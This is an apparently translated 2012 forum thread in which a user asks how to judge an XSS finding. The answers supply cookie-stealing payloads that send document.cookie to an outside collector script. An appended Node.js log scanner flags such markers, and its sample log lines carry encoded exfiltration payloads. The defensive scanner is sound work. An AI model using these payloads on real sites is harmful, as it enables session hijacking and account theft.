Information Security
Nimor, 2012-01-19 12:35:08

How to check for an XSS vulnerability?

Running: javascript: alert('xss')

Is it dangerous? Is it worth writing to support, or will they send me away?


5 answer(s)
int03e, 2012-01-19
@int03e

Is it done in a GET request? Instead of the alert, we substitute

<script>
document.location="http://yoursite.com/hack.php?cookie=" + document.cookie;document.location="http://www.site.com"
</script>

Where hack.php is our simple script for saving cookies. Sending a link, stealing cookies.

2012-01-19
@barmaley_exe

If alert('xss') is executed for you, then something like

var t=new Image();t.src='http://google.com/sniffer/?'+document.cookie;
must be executed too.
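
For whoever operates the affected site, the payloads quoted in the answers leave recognizable traces when they arrive in a GET request. The following is an added example, not code from the thread: a Node.js scanner that decodes the query strings in access-log lines and flags those markers. The log lines, addresses, paths and the collector.example host are constructed placeholders.

```javascript
// Added example: flag logged requests whose query string carries the
// script-injection markers seen in the answers above.
const MARKERS = [
  { name: 'script-tag',      re: /<\s*script\b/i },
  { name: 'javascript-uri',  re: /javascript\s*:/i },
  { name: 'cookie-access',   re: /document\s*\.\s*cookie/i },
  { name: 'forced-redirect', re: /document\s*\.\s*location\s*=/i },
  { name: 'image-beacon',    re: /new\s+Image\s*\(/i },
];

// Decode a bounded number of times so double-encoded input (%253C) is still seen.
function deepDecode(s, maxRounds = 3) {
  let cur = s.replace(/\+/g, ' ');
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; } // malformed escape
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Names of all markers present in the query string of one request target.
function scanRequest(target) {
  const q = target.indexOf('?');
  if (q === -1) return [];
  const decoded = deepDecode(target.slice(q + 1));
  return MARKERS.filter(m => m.re.test(decoded)).map(m => m.name);
}

// Parse common-log-format lines; return one finding per suspicious request.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = /^(\S+) .*?"(?:GET|POST) (\S+) HTTP\/[\d.]+"/.exec(line);
    if (!m) continue;
    const hits = scanRequest(m[2]);
    if (hits.length) findings.push({ client: m[1], hits });
  }
  return findings;
}

// Constructed sample log lines (documentation IP ranges, placeholder host).
const SAMPLE_LOG = [
  '203.0.113.5 - - [19/Jan/2012:12:40:01 +0000] "GET /search?q=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fcollector.example%2Fc%3F%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 512',
  '198.51.100.7 - - [19/Jan/2012:12:41:10 +0000] "GET /search?q=javascript HTTP/1.1" 200 734',
  '203.0.113.9 - - [19/Jan/2012:12:42:33 +0000] "GET /profile?name=%253Cscript%253Enew%2520Image()%253C%252Fscript%253E HTTP/1.1" 200 301',
];
console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

A hit only says the request carried such input; whether the page reflected it unescaped still has to be checked against the response.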
